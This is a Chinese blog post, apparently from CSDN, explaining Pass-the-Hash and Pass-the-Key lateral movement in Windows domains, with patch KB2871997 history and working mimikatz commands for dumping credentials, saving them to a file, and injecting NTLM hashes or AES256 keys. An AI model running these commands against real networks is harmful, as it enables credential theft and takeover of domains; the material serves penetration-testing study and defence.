看我横向打你内网--Pth&&Ptk

最新推荐文章于 2022-10-16 13:18:12 发布
最新推荐文章于 2022-10-16 13:18:12 发布
阅读量217 收藏
点赞数
文章标签: 安全漏洞 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43227251/article/details/115652850
版权

Pass the Hash&&Pass The Key

微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997

在域环境中,利用pass the hash的渗透方式往往是这样的:

  1. 获得一台域主机的权限
  2. Dump内存获得用户hash
  3. 通过pass the hash尝试登录其他主机
  4. 继续搜集hash并尝试远程登录
  5. 直到获得域管理员账户hash,登录域控,最终成功控制整个域

下面简要介绍一下Pass The Hash技术发展的几段历史

1、2012年12月

微软发布了针对Pass The Hash攻击的防御指导,链接如下:
[http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating%20Pass-the-Hash%20(PtH)%20Attacks%20and%20Other%20Credential%20Theft%20Techniques_English.pdf](http://download.microsoft.com/download/7/7/A/77ABC5BD-8320-41AF-863C-6ECFB10CB4B9/Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft Techniques_English.pdf)

如图这里写图片描述这里写图片描述

2、2014年5月13日

微软终于发布了更新补丁kb2871997,禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、PSEXEC、schtasks、at和访问文件共享。

然而,Craig在测试中发现,在打了补丁之后,常规的Pass The Hash已经无法成功,唯独默认的 Administrator (SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程连接。

并且值得注意的是即使administrator改名,它的SID仍然是500,这种攻击方法依然有效。所以对于防御来说,即使打了补丁也要记得禁用SID=500的管理员账户。

相关链接如下:
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html

3、如今

大家对Pass The Hash的认识越来越高,防御方法越来越多,比如上一篇提到的LAPS解决了域内主机本地管理员密码相同的问题。

同样,禁用NTLM使得psexec无法利用获得的ntlm hash进行远程连接。

4、mimikatz出现

它的出现再次改变了格局。mimikatz实现了在禁用NTLM的环境下仍然可以远程连接。

下面就实际测试一下其中的细节

Pass the Hash

抓取密码,本地管理员或者域管理员

privilege::debug
sekurlsa::logonpasswords

privilege::debug sekurlsa::logonpasswords >> C:/log.txt  获取hash

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:abc.com /ntlm:afffeba176210fad4628f0524bfe1942 /run:c:\windows\system32\cmd.exe"

在这里插入图片描述

Pass The Key (OverPass-the-Hash)

当系统安装了KB2871997补丁且禁用了NTLM的时候,那我们抓取到的ntlm hash

也就失去了作用,但是可以通过pass the key的攻击方式获得权限

mimikatz "privilege::debug" "sekurlsa::ekeys" 获取用户的aes key
mimikatz "privilege::debug" "sekurlsa::pth /user:dc /domain:abc.com /aes256:f74b379b5b422819db694aaf78f49177ed21c98ddad6b0e246a7e17df6d19d5c" 注入aes key

根据提示,尝试在系统安装补丁kb2871997后继续测试
安裝 : https://www.microsoft.com/en-us/download/details.aspx?id=42765
之后可以用\计算机名的方式通过远程共享查看目标机器(ps:这里必须要使用计算机名进行连接,会爆密码错误。 不要用win10测试,win10机器测试会在一分鐘后重啓 ,)
(如果获取的散列是NTLM,则Kerberos凭证加密方法是RC4。如果散列加密方法为AES,则Kerberos票使用AES进行的加密。)

qin9.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透- *** PTH(传递哈希)***PTT(传递票据)***PTK(传递密钥)
战神/calmness的博客
10-01 858
目录 PTH(pass-the-hash) Mimikatz wmiexec 第一种: 第二种: CrackMapExec PTT(pass the ticket) ms14-068 Golden ticket (黄金票据) silver ticket (白银票据) PTK (pass the key) ​​​​​​​ PTH(pass-the-hash) 描述 pass-the-hash内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM .
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-18 721
WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证KB2871997:禁止本地管理员账户用于远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。
内网安全(四)---横向渗透:PTH&PTK&PTT
qi_SJQ_的博客
02-11 4226
横向 PTH&PTK&PTT 哈希票据传递 1.知识: PTH(pass the hash) : 利用 lm 或 ntlm 的值。 PTT(pass the ticket): 利用的票据凭证 TGT 。 PTK(pass the key) : 利用的 ekeys 、aes256 。 1)PTHPTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。 如果禁用了 ntlm 认证,
PTH横向移动
网络安全。
02-24 4734
0x01 简介 PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
内网横向PTH&PTK&PTT哈希票据传递
mingyqf的博客
11-12 3975
内网横向PTH&PTK&PTT哈希票据传递 Kerberos 协议具体工作方法,在域中,简要介绍一下:  客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用 krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket)  将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据  然后客户机将 TGT 发送给域控
域渗透-横向移动(PTH)
m0_58596609的博客
11-15 2397
一. Windows本地认证 基础知识 Windows内部是不保存明文密码的,只保存密码的hash。 本机用户的密码hash是放在本地的SAM文件 里面,域内用户的密码hash是存在域控的NTDS.DIT文件里面。 SAM文件位置:%SystemRoot%\system32\config\sam 当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的“密码”进行对比,如果相同,则认证成功。 密码格式 Administrator:500:AAD3B435B51404EEAAD3B4
第68天:内网安全-域横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,域横向PTHPTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
vox-adv-cpk.pth.tar
03-10
first-order-model模型在VoxCeleb1数据集上的预训练模型基础版vox-adv-cpk.pth.tar,只有kp_detector和generator。
rfb-face-mask.pth
08-09
面部表情识别模型权重 https://github.com/Whiffe/PyTorch-Facial-Expression-Recognition
exp-schp-201908301523-atr.pth
04-16
Self-Correction-Human-Parsing SCHP models exp-schp-201908301523-atr.pth
内网渗透】域横向PTH&PTK&PTT哈希票据传递
ssrf
03-07 1274
目录0x001 相关知识0x002 域横向移动PTH NTML传递0x003 域横向移动PTK aes256传递0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&本地0x005 开源内网神器Ladon 0x001 相关知识 1)PTH(pass the hash) 利用LM或NTLM的值进行的渗透测试 PTH内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文密码。 如果禁用了NTLM认证,
活动目录攻击工具推荐
weixin_30588827的博客
02-21 1135
Summary Tools Most common paths to AD compromise MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) Open Shares GPO - Pivoting with Local Admin & Passwords in SYSVOL Dumping...
7、域渗透——Pass The Hash的实现
Fly_鹏程万里
06-11 2148
0x00 前言在之前的文章《域渗透——Pass The Hash & Pass The Key》曾介绍过kb2871997对Pass The Hash的影响。本文将站在另一个角度,介绍Pass The Hash的相关实现0x01 简介本文将要介绍以下内容:Pass The Hash的原理常用工具mimikatz中的Pass The Hashmimikatz中的Pass The Ticket...
Tryhackme-Overpass
个人博客
09-06 1023
Overpass 文章目录OverpassOverpassTask1 OverpassOverpass 2 - Hackedtask1 Forensics - Analyse the PCAPtask2 Research - Analyse the codetask3 Attack - Get back in!Overpass 3-HostingTask1 Overpass3 - Adventures in Hosting Overpass Task1 Overpass nmap扫描,靶机开启22-ssh
域渗透——Pass The Hash & Pass The Key
citelao的博客
03-21 1256
域渗透——Pass The Hash & Pass The Key 三好学生 · 2015/12/28 10:15 0x00 前言 对于Pass The Hash大家应该都很熟悉,在2014年5月发生了一件有趣的事。 微软在2014年5月13日发布了针对Pass The Hash的更新补丁kb2871997,标题为“Update to fix the Pass-The-Ha
内网渗透----域内横向移动
浅笑996的博客
12-20 6186
0x01.MS14-068 kerkeo工具 https://github.com/gentilkiwi/kekeo ) klist klist purge 删除所有票据 直接访问域控制器的C盘目录: dir \\qianxiao996-dm.qianxiao996.com\C$ 查看本机用户信息,记录用户名与SID号 whoami /all SID : S-1-5-21-2...
内网横向PTH
qq_44029310的博客
10-16 1924
内网横向PTH,以前的笔记整理,方便查看翻找。本文包括PsExec、CrackMapExec和WMI。
内网安全-常见横向移动总结
weixin_45701675的博客
04-25 5640
域内横向移动技术是在复杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁中,攻击者会利用该技术,以被攻陷的机器为跳板,访问其他域内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、域控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取域控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和业务相关的关键账户。因此,必须使用强口令来保护特权用户不被用于横向移动攻击,从而避免域内其他机器沦陷。建议管理员定期修改密码,从而使攻击者获取的权限失效。
windows内网渗透PTH/PTK攻击
ATpiu的博客
07-18 6182
前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hashhash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass the key(密钥传递攻击,简称ptk) 1.1 pass the hash攻击 1.1.1 NTLM HASH windows用户hash主要由以下部分组成,其中NTLM-HASH比LM-HASH的安全性要更高: 用户名称:RID:LM-HASH值:NTLM-HASH值 自Windows Vista和Wi
6_hp-karaoke-uvr.pth
最新发布
01-30
6_hp-karaoke-uvr.pth 是一个文件名,它代表了一种特定的文件格式。6_hp-karaoke-uvr.pth 文件可能是一个经过压缩或编码的音频文件,用于卡拉OK或歌曲演唱的目的。 .pth 是文件扩展名的一种常见形式,通常会提示该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值